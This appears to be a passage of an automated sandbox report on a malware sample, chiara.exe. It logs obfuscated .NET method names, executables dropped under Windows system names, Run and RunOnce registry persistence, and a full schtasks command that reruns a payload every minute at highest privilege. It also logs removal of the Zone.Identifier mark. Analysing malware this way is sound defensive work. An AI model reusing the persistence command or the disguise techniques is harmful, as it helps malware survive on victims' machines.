Source: 11.2.shost.exe.475185a.4.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	High entropy of concatenated method names: '_301DxXLIqB6Kn1247w', 'a6mX2ffp3eUzT12tvz', 't1iGtkoBKgZVSjqqbi', 'JSthv5RyhS5n7CMaFp', 't2judaKOPeTJSioBZI', 'aS2VlCJq2lMGOEiuP2', 'FwkFdtKhglDsP4W7y6', 'zYbZ95nYj3JVluddYp', '_5aVDxB8FEGezbQ0wb7', 'RHzXCWYGnaBmI2pjsu'
Source: 11.2.shost.exe.475185a.4.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	High entropy of concatenated method names: 'R8yeJ94Ijcid7osG8ADOoMnNUyPyVlpZ0tOZCRlsNF4GNXDsSab', 'rWdXMj4gSyVJuyZUVbNH1YC1pPDg6fSnottWFY6z1ttxBRJsyuB', 'AIFtFFoZ80lv0xkZhkh5z5RmMyN2OdehAH4NrNvNL1xQRkDkOFc', '_2uUJ6xOuGqemW1c34hKAUzyprE3VajYlP0oas4N3KtdQoLhUHAL', 'YcVGnezdTXbCjpwuldNstWxch485h36lnAeFaAbhr6ccmMxqhtZ', 'PMNvOuGeDw5a6xc2wQSWD6xAOP4pTPBPSJonHkTRAt5aZxHkrgn', '_5Y8CZEY5cAPjaksVnaQJd7bDGOxvdChABeohEIJnni21NJRQK0A', 'Ngif65ZkYv1rU9fF19DFGr7BbNPaf5C2u9QJmmCLlBEWAODtHid', 'vLWrdqSDjiQNwsZ1QQoqyqIDWy5ZTVJH73hrZRcjNWg3hce8cro', 'LpB7NKzyGTdYrVHDaFy9O8UR0SDr2FXiSS6BOvRDRfLaviUS2ir'
Source: 11.2.shost.exe.475185a.4.raw.unpack, qW1bSeqWgYkWpDiaOHefZ36Dz2H97nNHpy5txIE3CMuywm3p8NG.cs	High entropy of concatenated method names: 'W2JeRHbwf9GkgqkvMtpiUVSUY62mBIqXWC2vRa2M11DlD1xQ8v3', 'NF6YK9WGfWivk1XcWZI4QGGohRf4PCq4QTc0Es0Dr46g3PEZzp1', 'aXrdsGt4OKJseHXPqPAaM0dlwryQmRlZ1P0pfk5OG3g0Rhrf01A', '_7TZ7uFkjpg3NOgUipQK4rLqJVD6Ez8xpBwG09jviBagc0zSFyaq', 'bEcNMtgpn4FMVcLfB6ivBGEy3pjOz94bQN0uxu3DiS2xXijY99B', 'TSsS8QODIBf1yeNboSgkZ8QNh7nNviP8qReRjxX6XzsN63Kk8eN', '_8K3U3ATc4GXUZqtzTLuyq8GiIDknmebCfwgLgLu06CSkb9ory51', 'PcwMrOBUx1EpGOeyDeaH22EqVA9gSTSsExrIKscy3UqLjXX78PG', 'NWoQS66BW7fUB5xqUFPIi6MYjHQIPZ009Rex', 'eYwtM0SUrtPb7yYJK5NhTwDDPfA9MybYu1SE'
Source: 11.2.shost.exe.475185a.4.raw.unpack, DltdNNIpUjdX0vnRBtcnLVxL5HJRX7ZATkdt.cs	High entropy of concatenated method names: 'jtniHGRcIqy4cbxcB4MiT43g1tT6KlWOVc0I', 'pfJKokQLYXZpqjILwTAxoHO6Q5KWsVQ2un59', 'dbEsepGjkMBAZ8DraYuX2czrF1vv3GyLW5SE', 'cLxwHSsCPBDyNiynoW8bxAs7Vk8VNYQdVkya', 'uuCYBeQMixyT3h3j4UUvItd5i9O1', 'b7xDUl2IeFfmR3FfL963Whx35aXs', 'JHmEGwi3SjhCJCCqUHBpjm3ietTp', 'XyrmBwyusAD4chqRVI6xvfNok6sl', 'LtSBH9zO4IcApnn6pFGPnuBukEc6', 'IWDrC2W7HnNrRrGlyJiJO9zFLX7G'
Source: 11.2.shost.exe.475185a.4.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	High entropy of concatenated method names: 'A3EHC9sXbAqaAT4ksvRJDEhZoPVt0iIYXrGh', 'HkUkr2zlbjbrRkhZCWZHiB8rFTTaICemXSW7', 'C8FuHigg9uKJupwSLOvvyOJGTMwYYkgikgcQ', 'AlrKPXJEJCgYwajPc4wg5YSph0q2gt4dcPFu', 'aJc6M8kGNZq0zOZy2uB6XSzX9Tmb4hv5hsNe', 'iXT3UQBRnBPWQuIOkvsHvqc8ZZD759lWLafO', 'RlFQkiUrxenM8JFopntwrvAibdtPXYWw9IFA', 'iw7vcYegDQz1nIfIA4zog2DgIvOb45SwszNe', '_7UCsiSGVxE9vM8BJALK7EHw9VQEr81htLJDg', 'YVYs2ZbYi4XNzLhpZzvVWRgXnv9DWR9SHY0W'
Source: 11.2.shost.exe.46d420a.5.raw.unpack, q3DRJkDM1M5omu3Tac.cs	High entropy of concatenated method names: '_4GprCdNAxi9wnSzZhwMXkej62HfV1NQNP7Eu2LnJqCVOk4HyMxs2q', '_0lV76QAVhAlT3LrzgVu4HADX5ElflvQ9qjXenHmUgnUlUzkK0lfme', 'RFJaI9HoTIKdUE9QwPMfThThSWmDxLdjc9cFUPzLc9bRuHjlT5oCY', '_3c8RBpaKEfJtJtX373gqDkCnH8iXerkM8hpUZHJxgWnubXFqEXQgk'
Source: 11.2.shost.exe.46d420a.5.raw.unpack, Entu2TFCnp7YQ0fhEWmRxn0qoxfTK0xh7VtQ.cs	High entropy of concatenated method names: 'rA0A7liN5f1IAVE3ESuz3h8F8xgTRMxzYYM9', 'sotg1ICknSwEthPDBgt841ZbI8g7FlGf3Aom', '_7VFldC1Vicpg1T0GGcUFJ7tiAQE2waIbymen', 'M5GEuFkFshgSH', 'M2KYgtUhFJBai', 'aI53pHbjJZJjp', '_1MVulUQE3Xj1O', 'lYkuGpO4RZX8W', 'jvdNKiv7wKPPF', 'pHt2lfjlwW1Ld'
Source: 11.2.shost.exe.46d420a.5.raw.unpack, JNxYyDPFGXMwDs7opz.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Du1mBMfuCr9JVUVNRwoUVfccozTkMEi4vQvgOdbKuB0sHZ4KkQg0l', 'z02oBCi4mbJItotZqRWaM7Hg4cnhv616ooaUiJe2o7w5HXnnN6yW1', 'KqxbtOBWQSXnZIoMIjMXhb1iWgRbRnLhnQcIqYEhEshncQOqctw6A', 'qP7LvJJ5qipfYFLYvvF1vnLs14d76wGCIc72Z2ozAFTdWQBaiug7U'
Source: 11.2.shost.exe.46d420a.5.raw.unpack, LwscecAuA6uaYpJtiRqydj7d3vVUnDIe7MwdzljUF2ZSVPohck3.cs	High entropy of concatenated method names: 'QPalHBU2B7Hso9kAGAwSqcf5ZdCToMZXI5FThkubuv3BEpv6xab', 'nQVQL5zvgX08caQaSiAi2WvZfiMA', 'ivw9Q6GoAkOki0jiFKKma9zI2smP', 'n0B22gvDYGuWUdhdwxlRTwMrIIAj', 'U3PFo3uEyJvRNxuQdMUHbCmAJH14'
Source: 11.2.shost.exe.46d420a.5.raw.unpack, j4mKenyvTNNUaoVwEp.cs	High entropy of concatenated method names: 'CdcBkgrLX3QLcmmRZC', 'P3RvJG6WE51kmbOs32', 'iphTrMJPm24RLtPk4A', 'KDavIFrsoBlNTH9hKB', 'oUAs85zBGMtnzBzW5T', 'smhcQCUQxDFQ8r20qn', 'ClUTZdbgixYyqWDwQpVkR4S8YnQqRMXhOvu1yB9v1dUApUPc2FcpJ', 'I4yrePHihxRz6KKTRprO8VBKqXVCHPfWgH3zGtXFRcVWyzrZ2HJxw', 'OCI2PRd34GHJwhvrmozckLz65eokzFbpuyF7D29yAme295r6YXOlf', 'xZdW0O3SHYwIdRfygnDwhHNDpyiD0hjNFWoRDSlFGLXfVlM6iJGvk'
Source: 11.2.shost.exe.46d420a.5.raw.unpack, 1KdJpVKYNWXjVKuSp1.cs	High entropy of concatenated method names: '_301DxXLIqB6Kn1247w', 'a6mX2ffp3eUzT12tvz', 't1iGtkoBKgZVSjqqbi', 'JSthv5RyhS5n7CMaFp', 't2judaKOPeTJSioBZI', 'aS2VlCJq2lMGOEiuP2', 'FwkFdtKhglDsP4W7y6', 'zYbZ95nYj3JVluddYp', '_5aVDxB8FEGezbQ0wb7', 'RHzXCWYGnaBmI2pjsu'
Source: 11.2.shost.exe.46d420a.5.raw.unpack, IvZW7guxNL9u9GK8CGlbF6Dlkc6WS9b1wN97yDqCN4ap1z3QrMe.cs	High entropy of concatenated method names: 'R8yeJ94Ijcid7osG8ADOoMnNUyPyVlpZ0tOZCRlsNF4GNXDsSab', 'rWdXMj4gSyVJuyZUVbNH1YC1pPDg6fSnottWFY6z1ttxBRJsyuB', 'AIFtFFoZ80lv0xkZhkh5z5RmMyN2OdehAH4NrNvNL1xQRkDkOFc', '_2uUJ6xOuGqemW1c34hKAUzyprE3VajYlP0oas4N3KtdQoLhUHAL', 'YcVGnezdTXbCjpwuldNstWxch485h36lnAeFaAbhr6ccmMxqhtZ', 'PMNvOuGeDw5a6xc2wQSWD6xAOP4pTPBPSJonHkTRAt5aZxHkrgn', '_5Y8CZEY5cAPjaksVnaQJd7bDGOxvdChABeohEIJnni21NJRQK0A', 'Ngif65ZkYv1rU9fF19DFGr7BbNPaf5C2u9QJmmCLlBEWAODtHid', 'vLWrdqSDjiQNwsZ1QQoqyqIDWy5ZTVJH73hrZRcjNWg3hce8cro', 'LpB7NKzyGTdYrVHDaFy9O8UR0SDr2FXiSS6BOvRDRfLaviUS2ir'
Source: 11.2.shost.exe.46d420a.5.raw.unpack, qW1bSeqWgYkWpDiaOHefZ36Dz2H97nNHpy5txIE3CMuywm3p8NG.cs	High entropy of concatenated method names: 'W2JeRHbwf9GkgqkvMtpiUVSUY62mBIqXWC2vRa2M11DlD1xQ8v3', 'NF6YK9WGfWivk1XcWZI4QGGohRf4PCq4QTc0Es0Dr46g3PEZzp1', 'aXrdsGt4OKJseHXPqPAaM0dlwryQmRlZ1P0pfk5OG3g0Rhrf01A', '_7TZ7uFkjpg3NOgUipQK4rLqJVD6Ez8xpBwG09jviBagc0zSFyaq', 'bEcNMtgpn4FMVcLfB6ivBGEy3pjOz94bQN0uxu3DiS2xXijY99B', 'TSsS8QODIBf1yeNboSgkZ8QNh7nNviP8qReRjxX6XzsN63Kk8eN', '_8K3U3ATc4GXUZqtzTLuyq8GiIDknmebCfwgLgLu06CSkb9ory51', 'PcwMrOBUx1EpGOeyDeaH22EqVA9gSTSsExrIKscy3UqLjXX78PG', 'NWoQS66BW7fUB5xqUFPIi6MYjHQIPZ009Rex', 'eYwtM0SUrtPb7yYJK5NhTwDDPfA9MybYu1SE'
Source: 11.2.shost.exe.46d420a.5.raw.unpack, DltdNNIpUjdX0vnRBtcnLVxL5HJRX7ZATkdt.cs	High entropy of concatenated method names: 'jtniHGRcIqy4cbxcB4MiT43g1tT6KlWOVc0I', 'pfJKokQLYXZpqjILwTAxoHO6Q5KWsVQ2un59', 'dbEsepGjkMBAZ8DraYuX2czrF1vv3GyLW5SE', 'cLxwHSsCPBDyNiynoW8bxAs7Vk8VNYQdVkya', 'uuCYBeQMixyT3h3j4UUvItd5i9O1', 'b7xDUl2IeFfmR3FfL963Whx35aXs', 'JHmEGwi3SjhCJCCqUHBpjm3ietTp', 'XyrmBwyusAD4chqRVI6xvfNok6sl', 'LtSBH9zO4IcApnn6pFGPnuBukEc6', 'IWDrC2W7HnNrRrGlyJiJO9zFLX7G'
Source: 11.2.shost.exe.46d420a.5.raw.unpack, 7tBelVGdfCaQIjsR4NrUVA0ALzDaQiOg03ja.cs	High entropy of concatenated method names: 'A3EHC9sXbAqaAT4ksvRJDEhZoPVt0iIYXrGh', 'HkUkr2zlbjbrRkhZCWZHiB8rFTTaICemXSW7', 'C8FuHigg9uKJupwSLOvvyOJGTMwYYkgikgcQ', 'AlrKPXJEJCgYwajPc4wg5YSph0q2gt4dcPFu', 'aJc6M8kGNZq0zOZy2uB6XSzX9Tmb4hv5hsNe', 'iXT3UQBRnBPWQuIOkvsHvqc8ZZD759lWLafO', 'RlFQkiUrxenM8JFopntwrvAibdtPXYWw9IFA', 'iw7vcYegDQz1nIfIA4zog2DgIvOb45SwszNe', '_7UCsiSGVxE9vM8BJALK7EHw9VQEr81htLJDg', 'YVYs2ZbYi4XNzLhpZzvVWRgXnv9DWR9SHY0W'

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Windows\Resources\Themes\icsys.icn.exe	File created: C:\Windows\Resources\Themes\explorer.exe	Jump to dropped file
Source: C:\Windows\Resources\Themes\explorer.exe	File created: C:\Windows\Resources\spoolsv.exe	Jump to dropped file
Source: C:\Windows\Resources\spoolsv.exe	File created: C:\Windows\Resources\svchost.exe	Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\Resources\svchost.exe	Executable created and started: c:\windows\resources\spoolsv.exe	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Executable created and started: C:\Windows\Resources\Themes\icsys.icn.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Executable created and started: c:\windows\resources\themes\explorer.exe
Source: C:\Windows\System32\svchost.exe	Executable created and started: c:\windows\resources\svchost.exe

Source: C:\Windows\Resources\Themes\icsys.icn.exe	File created: C:\Windows\Resources\Themes\explorer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\chiara.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File created: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Jump to dropped file
Source: C:\Windows\Resources\Themes\explorer.exe	File created: C:\Windows\Resources\spoolsv.exe	Jump to dropped file
Source: C:\Windows\Resources\spoolsv.exe	File created: C:\Windows\Resources\svchost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\chiara.exe	File created: C:\Windows\Resources\Themes\icsys.icn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\chiara.exe	File created: C:\Users\user\Desktop\chiara.exe	Jump to dropped file

Source: C:\Windows\Resources\Themes\icsys.icn.exe	File created: C:\Windows\Resources\Themes\explorer.exe	Jump to dropped file
Source: C:\Windows\Resources\Themes\explorer.exe	File created: C:\Windows\Resources\spoolsv.exe	Jump to dropped file
Source: C:\Windows\Resources\spoolsv.exe	File created: C:\Windows\Resources\svchost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\chiara.exe	File created: C:\Windows\Resources\Themes\icsys.icn.exe	Jump to dropped file

Source: C:\Users\user\Desktop\chiara.exe

File created: C:\Users\user\Desktop\chiara.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Logon Application" /tr "C:\Users\user\AppData\Roaming\Windows Logon Application.exe"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Logon Application.lnk

Source: C:\Windows\Resources\svchost.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Logon Application.lnk

Source: C:\Windows\Resources\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Explorer	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Explorer	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Explorer	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Explorer	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Svchost	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Svchost	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Svchost	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Svchost	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Logon Application
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Logon Application

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe

File opened: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe\:Zone.Identifier read attributes | delete

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process information set: NOOPENFILEERRORBOX
